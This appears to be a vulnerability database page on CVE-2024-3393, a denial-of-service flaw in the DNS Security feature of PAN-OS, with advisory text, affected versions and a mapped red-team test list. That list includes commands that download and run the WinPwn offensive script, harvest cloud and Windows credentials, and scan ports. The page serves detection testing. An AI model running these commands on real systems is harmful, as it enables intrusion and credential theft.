CVE-2024-3393
Overview
This vulnerability is a denial of service condition caused by improper handling of malformed DNS packets within the DNS Security feature of Palo Alto Networks PAN-OS software. The root cause lies in the firewall's data plane processing logic, which fails to validate or sanitize certain DNS traffic inputs, leading to an unhandled exception that triggers a device reboot. The affected component is the DNS Security module embedded in the PAN-OS firewall data plane.
Vulnerability Description
A Denial of Service vulnerability in the DNS Security feature of Palo Alto Networks PAN-OS software allows an unauthenticated attacker to send a malicious packet through the data plane of the firewall that reboots the firewall. Repeated attempts to trigger this condition will cause the firewall to enter maintenance mode.
Impact
An attacker with network access can cause the firewall to reboot repeatedly, resulting in service disruption and denial of legitimate traffic through the device. No authentication or user interaction is needed to exploit the vulnerability. The firewall entering maintenance mode after repeated attacks can lead to extended downtime, impacting network security enforcement and potentially exposing the organization to further threats due to loss of firewall protection.
Solution
Palo Alto Networks has released patches addressing this issue in PAN-OS version 10.1.14 and related builds. Administrators should apply the updates as detailed in the official vendor advisory available at https://security.paloaltonetworks.com/CVE-2024-3393. No specific workarounds are documented; timely application of the vendor-provided patches is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical Denial of Service (DoS) vulnerability exists within the DNS Security feature of Palo Alto Networks PAN-OS software. This flaw allows unauthenticated attackers to send specially crafted packets through the firewall's data plane, leading to a system reboot. The nature of this vulnerability means that repeated exploitation can push the firewall into maintenance mode, effectively rendering it inoperable. This situation arises from the way the software processes DNS requests, which can be manipulated to trigger a failure state. The severity of this vulnerability is underscored by its high CVSS score of 8.7, indicating a significant risk to the integrity and availability of network security.
Attack vectors for this vulnerability are particularly concerning due to the unauthenticated nature of the exploitation. An attacker does not require any credentials or prior access to the network, making it accessible to anyone with the knowledge of how to craft the malicious packets. This ease of access allows for a wide range of exploitation scenarios, from targeted attacks against specific organizations to broader campaigns aimed at disrupting services across multiple entities using the affected software. The potential for automated tools to exploit this vulnerability increases the likelihood of widespread attacks, as attackers can easily deploy scripts to continuously bombard the firewall with malicious packets.
The real-world impact of this vulnerability can be profound, particularly for organizations relying on Palo Alto Networks firewalls for their security infrastructure. A successful attack could lead to significant downtime, resulting in loss of productivity and potential revenue. Furthermore, the transition of the firewall into maintenance mode could complicate recovery efforts, as IT teams may need to perform extensive troubleshooting to restore normal operations. The business risk extends beyond immediate operational disruption; it also includes reputational damage and potential regulatory repercussions, especially for organizations in sectors with stringent compliance requirements.
Detection and mitigation strategies are essential to safeguard against this vulnerability. Organizations should implement robust monitoring solutions capable of identifying unusual traffic patterns indicative of exploitation attempts. Intrusion detection systems (IDS) can be configured to alert administrators to suspicious DNS traffic, allowing for timely intervention. Additionally, applying security patches and updates provided by Palo Alto Networks is crucial to close this vulnerability. Regular vulnerability assessments and penetration testing can also help organizations identify and remediate weaknesses in their security posture before they can be exploited.
In conclusion, the Denial of Service vulnerability in the DNS Security feature of Palo Alto Networks PAN-OS poses a significant threat to network security. The combination of unauthenticated access, ease of exploitation, and potential for severe operational impact necessitates immediate attention from organizations using the affected software. By adopting proactive detection measures and ensuring timely updates, businesses can mitigate the risks associated with this vulnerability and enhance their overall cybersecurity resilience.
Affected Products (60)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h2:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h4:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h6:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.8 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.8 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h10:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.8 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h13:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.8 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h15:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.8 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h18:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.8 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h3:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.8 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h4:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.9 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.9 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h1:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.9 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h11:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.9 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h14:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.9 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h16:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.9 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h18:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.9 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h9:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-3393 |
| security.paloaltonetworks.com |
GitHub CVE
vendor-advisory
|
https://security.paloaltonetworks.com/CVE-2024-3393 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-3393 |